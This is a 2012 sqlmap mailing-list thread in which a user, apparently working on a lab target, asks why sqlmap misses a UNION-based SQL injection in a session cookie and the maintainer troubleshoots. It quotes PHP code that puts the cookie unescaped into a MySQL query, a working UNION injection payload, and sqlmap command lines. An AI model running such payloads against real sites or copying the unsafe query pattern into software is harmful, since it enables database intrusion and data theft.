Re: [sqlmap-users] Simple failed injection
From: Miroslav S. <mir...@gm...> - 2012-09-17 20:40:05
Hi Stephen.

There is really a problem here. Could you please update to the latest revision and do the: ... --flush-session -t traffic.txt -v 3 and send back the new session file.

It seems that for some reason sqlmap is doing only one type of boundary in your case (skipping this simple: ') ...

Also, it would be great if you send the full console output of such a clean run (please, use -v 3).

Kind regards,
Miroslav Stampar

On Sun, Sep 16, 2012 at 9:33 PM, Stephen Shkardoon <ss...@ss...> wrote:
> Hi,
>
> This is the HTML from a manual request with sesh cookie set
> to ')%20UNION%20select%201,2,3,4%20--%20
>
> <html>
> <head>
> <link rel='stylesheet' href='css/styles.css'/>
> <title>My Account - Customer Care Centre - Acme Power Co</title>
> </head>
> <body>
>
> <div id='heading'>
> </div>
>
> <div id='menu'>
> <a href='index.php'>Home / Login</a> -
> <a href='account.php'>My Account</a> -
> <a href='support.php'>Contact Support</a> -
> <a href='#'
> onClick='javascript:window.open("hours.php?data=ccc","newwin","width=210,height=200")'>CCC
> Opening Hours</a> -
> <a href='logout.php'>Logout</a>;
> </div>
>
>
> <div id='content'>
> <div id='billz'>
> Hi, 2!<br><br> Have a token:
> 86a2aeef8813bfa37a354e8997c77388<br><br>Please find below your account
> statement, released 04 November 2011. This account is due to be paid on
> <b>05 November 2011</b>. Failure to pay this amount before the due date may
> result in service disruption.<br><br><h3>Account
> Statement</h3><hr><table><tr><td width=200>Account Number</td><td
> width=450>Description of
> Service</td><td>Amount</td></tr></table><hr><table><tr><td
> width=200>1</td><td width=450>Basic Power
> Service</td><td>4</td></tr></table>
> </div>
> </div>
>
> </body>
> </html>
>
> ---------------------------
>
> The relevant bits being "Hi, 2", and the table showing amount of "4" etc.
>
> Thanks,
> ss23
>
> On Mon, Sep 17, 2012 at 6:58 AM, Miroslav Stampar <mir...@gm...> wrote:
>
>> Hi Stephen.
>>
>> From this traffic file it's not really clear if this is exploitable by
>> any means more than time-based.
>>
>> Could you please send the response you get when you "manually exploit" it
>> with the payload you've mentioned:
>> "sesh=')%20UNION%20select%201,2,3,4%20--%20" ?
>>
>> Kind regards,
>> Miroslav Stampar
>>
>> On Sat, Sep 15, 2012 at 1:33 AM, Stephen Shkardoon <ss...@ss...> wrote:
>>
>>> It ran a little over and started testing User-Agent, but it has the
>>> entire log for the session cookie there.
>>> The options I used this time were:
>>> python2 sqlmap.py -u "http://10.100.0.26/account.php" --cookie="sesh=1"
>>> -t traffic.txt --level=5
>>>
>>> Thanks,
>>> ss23
>>>
>>> On Sat, Sep 15, 2012 at 10:31 AM, Miroslav Stampar <mir...@gm...> wrote:
>>>
>>>> Hi.
>>>>
>>>> In that case could you please send the sqlmap traffic file got by using
>>>> -t traffic.txt along with your standard switches/options?
>>>>
>>>> Kind regards,
>>>> Miroslav Stampar
>>>>
>>>> On Sat, Sep 15, 2012 at 12:09 AM, Stephen Shkardoon <ss...@ss...> wrote:
>>>>
>>>>> Hi,
>>>>>
>>>>> Sorry, my mistake. I just copied the line and altered it to show that
>>>>> the cookie was being used. In the real script, there was no parse error.
>>>>> Nonetheless, sqlmap cannot pull out results.
>>>>>
>>>>> Thanks
>>>>> ss23
>>>>>
>>>>> On Sat, Sep 15, 2012 at 9:55 AM, Miroslav Stampar <mir...@gm...> wrote:
>>>>>
>>>>>> Hi.
>>>>>>
>>>>>> I am not sure how you are able to "definitely able to pull out
>>>>>> results" as, as far as I can see, the problem lies in the PHP used (enclosed pair of
>>>>>> single quotes with another pair of single quotes):
>>>>>>
>>>>>> Bad:
>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>>> sessionid = *'$_COOKIE['sesh']'*)");
>>>>>>
>>>>>> Good 1:
>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>>> sessionid = *'$_COOKIE[sesh]'*)");
>>>>>>
>>>>>> Good 2:
>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>>> sessionid = " . *$_COOKIE['sesh'] . "*)");
>>>>>>
>>>>>> With that code of yours you should get an ugly PHP error message:
>>>>>> "Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE,
>>>>>> expecting T_STRING or T_VARIABLE or T_NUM_STRING"
>>>>>>
>>>>>> Also, you could take a look at a similar case here [1].
>>>>>>
>>>>>> Kind regards,
>>>>>> Miroslav Stampar
>>>>>>
>>>>>> [1]
>>>>>> http://www.hotscripts.com/forums/php/21179-php-parse-error-parse-error-unexpected-t_encapsed_and_whitespace-expecting-t_strin.html
>>>>>>
>>>>>> On Fri, Sep 14, 2012 at 8:08 PM, Stephen Shkardoon <ss...@ss...> wrote:
>>>>>>
>>>>>>> Hi all,
>>>>>>>
>>>>>>> Trying to do a (simple) injection with sqlmap, and I can't seem to
>>>>>>> coax it into getting it right.
>>>>>>> The PHP source looks something like:
>>>>>>>
>>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>>>> sessionid = '$_COOKIE['sesh']')");
>>>>>>>
>>>>>>> and then it displays the fields it pulled out.
>>>>>>>
>>>>>>> The command(s) I've tried look something like ./sqlmap.py -u
>>>>>>> site.com/script.php --cookie="sesh=1" --cookie-urlencode --level=5
>>>>>>> --risk=5. However, the only injection point it finds is AND/OR time-based
>>>>>>> blind, which is horribly slow. Of course, manually, I can do a
>>>>>>> sesh=')%20UNION%20select%201,2,3,4%20--%20 or similar, so
>>>>>>> I'm definitely able to pull out results.
>>>>>>>
>>>>>>> Anything I can do to push sqlmap in the right direction?
>>>>>>>
>>>>>>> Thanks,
>>>>>>> ss23
>>>>>>>
>>>>>>> _______________________________________________
>>>>>>> sqlmap-users mailing list
>>>>>>> sql...@li...
>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>
>>>>>> --
>>>>>> Miroslav Stampar
>>>>>> http://about.me/stamparm
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm